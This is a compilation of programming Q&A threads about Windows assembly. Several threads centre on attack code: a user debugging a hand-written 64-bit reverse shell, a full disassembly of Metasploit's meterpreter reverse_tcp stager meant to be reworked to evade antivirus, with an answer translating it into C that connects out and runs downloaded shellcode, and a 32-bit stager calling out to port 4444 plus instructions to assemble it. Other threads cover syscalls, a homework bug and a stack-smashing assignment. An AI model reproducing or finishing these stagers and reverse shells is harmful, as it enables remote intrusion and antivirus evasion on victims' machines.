hello i am writing windows 64bit reverse shell in assembly and after gett connected to the targetmachine ip, i want to create process to spwan a shell, fistly i try to write startinfo struct for createprocess api, but after then i pass all the parameters to the function but it doesn't work, and here is full code https://pastebin.com/6Ft2jCMX
;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop rcx ; Set ECX for the loop
xor r11,r11
push_loop:
push r11 ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r14 ; HANDLE hStdInput;
mov [r12+0x58],r14 ; HANDLE hStdOutput;
mov [r12+0x60],r14 ;HANDLE hStdError;
;createprocessA_calling
sub rsp, 0x70
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx ;createprocessA
so at last when i call the createprocessA it got stuck
Related
I am trying to find a specific pattern in the Windows system calls, for research purposes.
So far i've been looking into the Windows dlls such as ntdll.dll, user32.dll, etc., but those seem to contain only wrapper codes for preparing to jump to the system call. For example:
mov eax, 101Eh
lea edx, [esp+arg_0]
mov ecx, 0
call large dword ptr fs:0C0h
retn 10h
I'm guessing the call large dword ptr fs:0C0h instruction is another gateway in the chain that finally leads to the actual assembly, but I was wondering if I can get to that assembly directly.
You're looking in the wrong dlls. The system calls are in ntoskrnl.exe.
If you look at NtOpenFile() in ntoskrnl.exe you'll see:
mov r11, rsp
sub rsp, 88h
mov eax, [rsp+88h+arg_28]
xor r10d, r10d
mov [r11-10h], r10
mov [rsp+88h+var_18], 20h ; int
mov [r11-20h], r10d
mov [r11-28h], r10
mov [r11-30h], r10d
mov [r11-38h], r10d
mov [r11-40h], r10
mov [rsp+88h+var_48], eax ; int
mov eax, [rsp+88h+arg_20]
mov [rsp+88h+var_50], 1 ; int
mov [rsp+88h+var_58], eax ; int
mov [r11-60h], r10d
mov [r11-68h], r10
call IopCreateFile
add rsp, 88h
retn
Which is the true body of the function. Most of the work is done in IopCreateFile(), but you can follow it statically and do whatever analysis you need.
After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?
your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)
Can you tell me how I can execute this code on a windows 7 32bit machine?
Do I need to compile it? If yes, how should I do this?
Which ending (.exe) should the file have?
section .bss
section .data
section .text
global _start
_start:
cld
call dword loc_88h
pushad
mov ebp,esp
xor eax,eax
mov edx,[fs:eax+0x30]
mov edx,[edx+0xc]
mov edx,[edx+0x14]
loc_15h:
mov esi,[edx+0x28]
movzx ecx,word [edx+0x26]
xor edi,edi
loc_1eh:
lodsb
cmp al,0x61
jl loc_25h
sub al,0x20
loc_25h:
ror edi,byte 0xd
add edi,eax
loop loc_1eh
push edx
push edi
mov edx,[edx+0x10]
mov ecx,[edx+0x3c]
mov ecx,[ecx+edx+0x78]
jecxz loc_82h
add ecx,edx
push ecx
mov ebx,[ecx+0x20]
add ebx,edx
mov ecx,[ecx+0x18]
loc_45h:
jecxz loc_81h
dec ecx
mov esi,[ebx+ecx*4]
add esi,edx
xor edi,edi
loc_4fh:
lodsb
ror edi,byte 0xd
add edi,eax
cmp al,ah
jnz loc_4fh
add edi,[ebp-0x8]
cmp edi,[ebp+0x24]
jnz loc_45h
pop eax
mov ebx,[eax+0x24]
add ebx,edx
mov cx,[ebx+ecx*2]
mov ebx,[eax+0x1c]
add ebx,edx
mov eax,[ebx+ecx*4]
add eax,edx
mov [esp+0x24],eax
pop ebx
pop ebx
popad
pop ecx
pop edx
push ecx
jmp eax
loc_81h:
pop edi
loc_82h:
pop edi
pop edx
mov edx,[edx]
jmp short loc_15h
loc_88h:
pop ebp
push dword 0x3233
push dword 0x5f327377
push esp
push dword 0x726774c
call ebp
mov eax,0x190
sub esp,eax
push esp
push eax
push dword 0x6b8029
call ebp
push byte +0x10
jmp dword loc_1ceh
loc_b2h:
push dword 0x803428a9
call ebp
lea esi,[eax+0x1c]
xchg esi,esp
pop eax
xchg esp,esi
mov esi,eax
push dword 0x6c6c
push dword 0x642e7472
push dword 0x6376736d
push esp
push dword 0x726774c
call ebp
jmp dword loc_1e3h
loc_dfh:
push dword 0xd1ecd1f
call ebp
xchg ah,al
ror eax,byte 0x10
inc eax
inc eax
push esi
push eax
mov esi,esp
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
inc eax
push eax
push eax
push dword 0xe0df0fea
call ebp
mov edi,eax
loc_104h:
push byte +0x10
push esi
push edi
push dword 0x6174a599
call ebp
test eax,eax
jz loc_122h
dec dword [esi+0x8]
jnz loc_104h
xor eax,eax
push eax
push dword 0x56a2b5f0
call ebp
loc_122h:
push dword 0x3233
push dword 0x72657375
push esp
push dword 0x726774c
call ebp
push dword 0x657461
push dword 0x74537965
push dword 0x4b746547
push esp
push eax
push dword 0x7802f749
call ebp
push esi
push edi
push eax
xor ecx,ecx
mov esi,ecx
mov cl,0x8
loc_155h:
push esi
loop loc_155h
loc_158h:
xor ecx,ecx
xor esi,esi
push byte +0x8
push dword 0xe035f044
call ebp
loc_165h:
mov eax,esi
cmp al,0xff
jnc loc_158h
inc esi
push esi
call dword [esp+0x24]
mov edx,esi
xor ecx,ecx
mov cl,0x80
and eax,ecx
xor ecx,ecx
cmp eax,ecx
jnz loc_18fh
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
btr [esp+eax*4],edx
jmp short loc_165h
loc_18fh:
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
bt [esp+eax*4],edx
jc loc_165h
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
bts [esp+eax*4],edx
push esi
push byte +0x10
push dword [esp+0x30]
push byte +0x0
push byte +0x1
lea ecx,[esp+0x10]
push ecx
push dword [esp+0x3c]
push dword 0xdf5c9d75
call ebp
lea esp,[esp+0x4]
jmp short loc_158h
loc_1ceh:
call dword loc_b2h
db "www.example.com",0
loc_1e3h:
call dword loc_dfh
db "4444",0
This looks like 32-bit NASM assembly code(A simple beginners introduction). You can assemble it (not compile it) with this installer from the NASM website (version 2.12.02 at the time of this answer).
Assembling and linking it on Windows 7 works like this:
If you have the Microsoft C compiler, you have (somewhere) the linker from Microsoft named link.exe. If you don’t, you can download the Windows 7 SDK, which provides the C compiler and linker(link.exe).
nasm -f win32 yourProg.asm
link /entry:_start /subsystem:console yourProg.obj <locationOfYour>\kernel32.lib
But a quick glance over the code makes obvious that there are NO obviously named API calls in it, so the destination platform(Windows, Linux, MacOS, other) is difficult to determine. So this code may assemble, but its execution may(!) be useless(unless run in a debugger) nevertheless.
My program is supposed to read an integer n from the user and then calculate all the divisors and if they are prime or not. I am using the Irvine 32 library. Now this is the weird part, when I enter in an even number my program executes as it is supposed to. When I enter in and odd number my program gets the error which is the title of this post.
My main Proc:
main PROC
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This block displays greeting and newline;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov edx, OFFSET greeting
call Writestring
call Crlf
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This block gets the integer from the user;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
call GetInt
call Crlf
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This block gets calculates the divsiors and prime divisors.;
; It then puts them in to an array to get ready to display. ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
call CalcDivisors
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This block displays the results to the screen. ;
; in an n-1 by 3 table. ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
call Display_Results
exit
main ENDP
Now the Proc that has produces the error:
CalcDivisors PROC uses eax ebx ecx edx esi edi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Function calculates divisors then pushes them on to an array;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,0
mov ecx,0
mov ebx,0
mov edx,0
mov esi,0
mov edi,0
mov ecx,n
sub ecx,1
mov eax,n
mov ebx,divisors
mov esi,OFFSET prime_arr
mov edi,OFFSET div_arr
push eax
Calc_Div:
call dumpregs
div ebx
call dumpregs
cmp edx,0
jz Calc_Prime_Div
inc ebx
mov edx,0
mov eax,n
loop Calc_Div
Calc_Prime_Div:
cmp ebx,2
jz Push_2_array
push ebx
push ecx
mov eax,0
mov eax,ebx
mov ecx,ebx
mov divisor_counter,ebx
sub ecx,2
mov ebx,0
mov ebx,prime_divisors
P1:
call dumpregs
div ebx
call dumpregs
cmp edx,0
jz Push_div_array
inc ebx
mov eax,divisor_counter
mov edx,0
loop P1
jmp Push_prime_array
Jump_above:
call dumpregs
loop Calc_div
call dumpregs
jmp foo
Push_prime_array:
pop ecx
pop ebx
mov [esi],ebx
mov eax,[esi]
call writedec
add esi,4
mov eax,0
mov eax,n
call dumpregs
inc ebx
call dumpregs
jmp jump_above
call dumpregs
Push_div_array:
pop ecx
pop ebx
mov [edi],ebx
mov eax,[edi]
call writedec
add edi,4
mov eax,0
mov eax,n
call dumpregs
inc ebx
jmp Jump_above
Push_2_array:
mov [esi],ebx
add esi,4
inc ebx
pop eax
jmp Jump_above
foo:
ret
CalcDivisors ENDP
Now the line that is giving me the exact error is the following:
foo:
ret
It is boggling my mind as to why it is crashing when I enter in an odd number for n and not crashing when n is even. Any suggestions?
It looks like you forget to pop some values from the stack. Check the number of push and pop instructions executed.
I'm having problems with the Virtualprotect() api by windows.
I got an assignment from school, my teacher told us that in the past when memory was scarce and costly. Programmers had to create advanced algorithms that would modify itself on the fly to save memory. So there you have it, we must now write such an algorithm, it doesn't have to be effective but it must modify itself.
So I set out to do just that, and I think that I made it pretty far before asking for any help.
My program works like this:
I have a function and a loop with a built-in stack overflow. The stack gets overflown with the address of a memory location where code resides that is constructed during the loop. Control is passed to the code in memory. The code loads a dll and then exits, but before it exits it has to repair the loop. It is one of the conditions of our assignment, everything changed in the original loop must be restored.
The problem is that I don't have write access to the loop, only READ_EXECUTE, so to change my access I thought, I use virtualprotect. But that function returned an error:
ERROR_NOACCESS, the documentation on this error is very slim, windows only says: Invailid access to memory address. Which figures since I wanted to change the access in the first place. So what's wrong? Here's the code constructed in memory:
The names of all the data in my code is a little vague, so I provided a few comments
Size1:
TrapData proc
jmp pLocals
LocalDllName db 100 dup(?) ; name of the dll to be called ebx-82h
RestoreBuffer db 5 dup(?) ; previous bytes at the overflow location
LoadAddress dd 0h ; ebx - 19h ; address to kernel32.loadlibrary
RestoreAddress dd 0h ; ebx - 15h ; address to restore (with the restore buffer)
AddressToRestoreBuffer dd 0h ; ebx - 11h ; obsolete, I don't use this one
AddressToLea dd 0h ; ebx - 0Dh Changed, address to kernel32.virutalprotect
AddressToReturnTo dd 0h ; ebx - 9h address to return execution to(the same as RestoreAddress
pLocals:
call Refpnt
Refpnt: pop ebx ; get current address in ebx
push ebx
mov eax, ebx
sub ebx, 82h
push ebx ; dll name
sub eax, 19h ; load lib address
mov eax, [eax]
call eax
pop ebx ; Current address
push ebx
;BOOL WINAPI VirtualProtect(
; __in LPVOID lpAddress,
; __in SIZE_T dwSize,
; __in DWORD flNewProtect,
; __out PDWORD lpflOldProtect
;);
mov eax, ebx
mov esi, ebx
sub eax, 82h
push eax ; overwrite the buffer containing the dll name, we don't need it anymore
push PAGE_EXECUTE_READWRITE
push 5h
sub esi, 15h
mov esi, [esi]
push esi
sub ebx, 0Dh
mov ebx, [ebx]
call ebx ; Returns error 998 ERROR_NOACCESS (to what?)
pop ebx
push ebx
sub ebx, 1Eh
mov eax, ebx ; restore address buffer pointer
pop ebx
push ebx
sub ebx, 15h ; Restore Address
mov ebx, [ebx]
xor esi, esi ; counter to 0
#0:
push eax
mov al, byte ptr[eax+esi]
mov byte ptr[ebx+esi], al
pop eax
inc esi
cmp esi, 5
jne #0
pop ebx
sub ebx, 9h
mov ebx, [ebx]
push ebx ; address to return to
ret
Size2:
So what's wrong?
Can you guys help me?
EDIT, Working code:
Size1:
jmp pLocals
LocalDllName db 100 dup(?)
RestoreBuffer db 5 dup(?)
LoadAddress dd 0h ; ebx - 19h
RestoreAddress dd 0h ; ebx - 15h
AddressToRestoreBuffer dd 0h ; ebx - 11h
AddressToLea dd 0h ; ebx - 0Dh
AddressToReturnTo dd 0h ; ebx - 9h
pLocals:
call Refpnt
Refpnt: pop ebx ; get current address in ebx
push ebx
mov eax, ebx
sub ebx, 82h
push ebx ; dll name
sub eax, 19h ; load lib address
mov eax, [eax]
call eax
pop ebx ; Current address
push ebx
;BOOL WINAPI VirtualProtect(
; __in LPVOID lpAddress,
; __in SIZE_T dwSize,
; __in DWORD flNewProtect,
; __out PDWORD lpflOldProtect
;);
mov esi, ebx
push 0
push esp
push PAGE_EXECUTE_READWRITE
push 5h
sub esi, 15h
mov esi, [esi]
push esi
sub ebx, 0Dh
mov ebx, [ebx]
call ebx
pop ebx
pop ebx
push ebx
sub ebx, 1Eh
mov eax, ebx ; restore address buffer pointer
pop ebx
push ebx
sub ebx, 15h ; Restore Address
mov ebx, [ebx]
xor esi, esi ; counter to 0
#0:
push eax
mov al, byte ptr[eax+esi]
mov byte ptr[ebx+esi], al
pop eax
inc esi
cmp esi, 5
jne #0
pop ebx
sub ebx, 9h
mov ebx, [ebx]
push ebx ; address to return to
ret
Size2:
Maybe a little sloppy, but I that doesn't mater ;)
You are trying to make VirtualProtect write lpflOldProtect to a read-only memory location, i.e. your current code section which is what you're trying to unprotect in the first place! My guess is this is what gives you the ERROR_NO_ACCESS. Since you're using the stack anyway, have it write lpflOldProtect to a stack location.
This isn't nearly as easy as it was in the old days; read access used to imply execute access, and a lot of memory mappings were mapped writable.
These days, I'd be surprised if there are many (any?) memory mappings that are both writable and executable. (And modern CPUs with PAE support are sufficient for even 32-bit kernels to provide non-executable-yet-readable mappings.)
I'd say, first things first, find an older Windows system, Win2k or earlier, then start trying to tackle this problem. :)
EDIT: Oh! I thought loading the DLL failed. Good work. :)
What do you mean by 'restore the loop'? Since you smashed the stack to jump to your code, you didn't really destroy the loop's text segment, you only scribbled on the stack. You could insert another function before your loop, then return from your dll to the function that called your loop. (You 'returned' into your injected code from the loop, so you can't return into the loop without building a fake stack frame for it; returning to the previous function seems easier than building a fake stack frame.)